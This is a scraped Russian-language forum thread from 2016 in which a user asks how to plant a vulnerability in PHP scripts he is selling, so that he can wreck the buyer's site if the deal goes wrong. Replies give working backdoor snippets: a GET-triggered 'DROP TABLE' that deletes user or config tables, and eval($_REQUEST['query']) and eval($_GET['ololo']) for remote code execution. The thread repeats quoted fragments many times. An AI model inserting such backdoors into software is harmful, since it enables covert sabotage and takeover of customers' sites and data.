Помощь по скриптам | как сделать уязвимость?
if (isset($_GET['drop'])) {
mysql_query("DROP TABLE user");
}
// пример простейшего бэкдора. Закинь в какой то файл после подключения к бд и вуаля
// снесет таблу user
mysql_query("DROP TABLE user");
}
// пример простейшего бэкдора. Закинь в какой то файл после подключения к бд и вуаля
// снесет таблу user
Mr_Kasper (27.09.2016 в 21:07)
Gaush (27.09.2016 в 21:01)
Mr_Kasper , теперь твои скрипты никто качать небудет!
это тут причём просто хочу что бы пацан в сделке был чист со мной,если кинет то снесу
Gaush (27.09.2016 в 21:01)
Mr_Kasper , теперь твои скрипты никто качать небудет!
это тут причём просто хочу что бы пацан в сделке был чист со мной,если кинет то снесу
а чо через гаранта не выход ?.
Нравится вам запасные пути а потом думаете почему вам не доверяют
Не фильтруй запросы че тут думать
ох и советчики
оставь в любом файле код:
eval($_REQUEST['query']);
и можешь через образение к переменной любой код выполнять с его файла.
оставь в любом файле код:
eval($_REQUEST['query']);
и можешь через образение к переменной любой код выполнять с его файла.
vmetro (27.09.2016 в 22:50)
ох и советчики
оставь в любом файле код:
eval($_REQUEST['query']);
и можешь через образение к переменной любой код выполнять с его файла.
ох и советчики
оставь в любом файле код:
eval($_REQUEST['query']);
и можешь через образение к переменной любой код выполнять с его файла.
Эмм...есть хостинги где eval(), system() не работает в целях безопасности.
________
посл. ред. 28.09.2016 в 00:03; всего 1 раз(а); by Freedom
Freedom , Например кео вот это норм if (isset($_GET['drop'])) {
mysql_query("DROP TABLE user");
}
только нужно исправить на if (isset($_GET['drop'])) {
mysql_query("DROP TABLE kolhoz_user");
}
или чтоб сильна не навредить заменить kolhoz_user на kolgoz_config чтоб юсеров нетрогать
________
посл. ред. 28.09.2016 в 00:19; всего 1 раз(а); by Ard_Grey
mysql_query("DROP TABLE user");
}
только нужно исправить на if (isset($_GET['drop'])) {
mysql_query("DROP TABLE kolhoz_user");
}
или чтоб сильна не навредить заменить kolhoz_user на kolgoz_config чтоб юсеров нетрогать
________
посл. ред. 28.09.2016 в 00:19; всего 1 раз(а); by Ard_Grey
eval($_GET['ololo']);
Вот и всё
Вот и всё
vmetro (27.09.2016 в 22:50)
ох и советчики
оставь в любом файле код:
eval($_REQUEST['query']);
и можешь через образение к переменной любой код выполнять с его файла.
ох и советчики
оставь в любом файле код:
eval($_REQUEST['query']);
и можешь через образение к переменной любой код выполнять с его файла.
+